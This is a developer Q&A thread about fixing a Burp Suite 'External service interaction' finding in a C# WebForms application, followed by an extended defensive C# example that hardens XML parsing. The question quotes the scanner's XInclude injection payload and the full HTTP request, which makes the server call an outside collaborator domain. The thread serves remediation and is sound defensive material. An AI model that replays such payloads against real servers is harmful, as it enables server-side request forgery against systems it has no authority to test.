I got this Burp vulnerability report: External service interaction (HTTP).

XML is injected in the URL path. I wonder if anyone has any idea how to prevent this. I'm working on a web application in Visual Studio using C# WebForms.

I was thinking maybe it could be prevented in IIS or in the web.config file, but I'm not sure.


Issue detail

It is possible to induce the application to perform server-side HTTP requests to arbitrary domains. The payload <xi:include href="http://o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo"/> was submitted in the URL path filename. This payload contains some XML with an XInclude expression that references a URL on an external domain.

The application performed an HTTP request to the specified domain, indicating that the XML parser processed the injected XInclude definition.

    GET /EmployeeDetails/%3cuhz%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo%22/%3e%3c/uhz%3e?RequestId=428 HTTP/1.1
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    Connection: close

Jay
  • Must be caused by the XML namespace: xmlns – jdweng Aug 26 '20 at 16:35
  • You could try to use this code: `XmlDocument xmlDoc = new XmlDocument(); xmlDoc.XmlResolver = null; xmlDoc.LoadXml(OurOutputXMLString);` https://stackoverflow.com/questions/14230988/how-to-prevent-xxe-attack-xmldocument-in-net – Jalpa Panchal Aug 27 '20 at 08:50

1 Answer

External Service Interaction, or in other words SSRF, means that the web server issues a GET request on behalf of the user. In your case, the application issues a GET request on its own behalf to the user-provided URL, i.e., <xi:include href="http://o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo"/>. Depending upon your web application's functionality, you may or may not be able to block external URLs. You can follow any of the steps below to prevent this:

  • Blocklist or whitelist domain names.
  • Block/filter user-provided URLs.
  • Prevent C# code from issuing GET requests to user-provided URLs.
Usama Azad
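The three bullets above, and the `XmlResolver = null` suggestion in the question's comments, can be put together in one place. The following is an added example for a C# WebForms app; it is not code from the question, the answer, or the application under test. It assumes the route segment is meant to be a plain filename (the `[A-Za-z0-9_-]` rule is an assumption), that the only legitimate external XML source is a hypothetical `xml.example.internal` host, and that `EmployeeDetails` reads the file through `XmlDocument`. Note that the .NET base class library does not process `xi:include` on its own; if the application uses a separate XInclude processor, the same allowlisting resolver should be handed to that processor as well, otherwise the reader settings here do not cover it.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Text.RegularExpressions;
using System.Xml;

// Added example: defence in depth against the Burp "External service interaction" finding.
//  1. Validate the user-controlled path segment before any XML code sees it.
//  2. Resolve external references only for an explicit host allowlist (deny by default).
//  3. Prohibit DTDs and disable default resolution on every reader that touches input.
// Host names and the filename rule are assumptions for illustration.

public sealed class AllowlistXmlResolver : XmlUrlResolver
{
    private readonly HashSet<string> _allowedHosts;

    public AllowlistXmlResolver(IEnumerable<string> allowedHosts)
    {
        _allowedHosts = new HashSet<string>(allowedHosts, StringComparer.OrdinalIgnoreCase);
    }

    // Every external fetch (DTD, external entity, XInclude via a processor that uses
    // this resolver) passes through here, so this is where the allowlist is enforced.
    public override object GetEntity(Uri absoluteUri, string role, Type ofObjectToReturn)
    {
        if (absoluteUri.Scheme != Uri.UriSchemeHttps || !_allowedHosts.Contains(absoluteUri.Host))
        {
            // Refusing here is what stops the server reaching out to burpcollaborator.net-style hosts.
            throw new XmlException("External resource blocked by policy: " + absoluteUri);
        }
        return base.GetEntity(absoluteUri, role, ofObjectToReturn);
    }
}

public static class SafeEmployeeXml
{
    // Assumed rule: 1-64 characters of [A-Za-z0-9_-], optionally ending in ".xml".
    // Anything containing '<', ':', '"' or '/' (as the decoded payload does) is rejected.
    private static readonly Regex FileNamePattern =
        new Regex(@"^[A-Za-z0-9_-]{1,64}(\.xml)?$", RegexOptions.CultureInvariant);

    public static bool IsValidFileName(string fileName)
    {
        return fileName != null && FileNamePattern.IsMatch(fileName);
    }

    // Reader settings for any XML that is user-influenced. Passing null as the resolver
    // means nothing external is ever fetched, which is the right default for most apps.
    public static XmlReaderSettings HardenedSettings(XmlResolver resolver)
    {
        return new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit, // no DOCTYPE, so no external or expanding entities
            XmlResolver = resolver,
            MaxCharactersFromEntities = 1024,
            MaxCharactersInDocument = 1L << 20
        };
    }

    // Loads an employee record by filename, applying all three layers.
    public static XmlDocument LoadEmployeeRecord(string baseDirectory, string fileName, XmlResolver resolver)
    {
        if (!IsValidFileName(fileName))
        {
            throw new ArgumentException("Invalid employee filename", nameof(fileName));
        }

        string fullPath = Path.Combine(baseDirectory, fileName);
        var doc = new XmlDocument { XmlResolver = null }; // XmlDocument has its own resolver; disable it too
        using (var reader = XmlReader.Create(fullPath, HardenedSettings(resolver)))
        {
            doc.Load(reader);
        }
        return doc;
    }
}

// Usage from a code-behind, e.g. EmployeeDetails.aspx.cs (hypothetical route value and host):
//   var resolver = new AllowlistXmlResolver(new[] { "xml.example.internal" });
//   var doc = SafeEmployeeXml.LoadEmployeeRecord(Server.MapPath("~/App_Data/Employees"),
//                                                RouteData.Values["filename"] as string, resolver);
```

Using `null` for the resolver is the simplest and safest choice when the employee files never reference anything external; the allowlisting resolver is for the case the answer mentions where the application's functionality does legitimately need one known host. Either way, the filename check rejects the injected `<uhz xmlns:xi=...>` payload before a parser is ever constructed, so the XInclude never gets a chance to be processed.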
  • Thank you for providing some valuable insight on remediation. I have searched for a couple of hours and this was the first list I found to actually provide some helpful insight to resolve. – Jordan_Walters Jun 07 '21 at 13:58
  • @Jordan_Walters Can you please explain what code changes you did to resolve the issue? I am facing a similar issue in my .NET web application. – RSB Jun 16 '21 at 16:25
  • @RSB it ended up being a setting in CloudFlare that we were able to utilize. I would look to see if your CDN provider has a solution if possible. – Jordan_Walters Jul 15 '21 at 17:06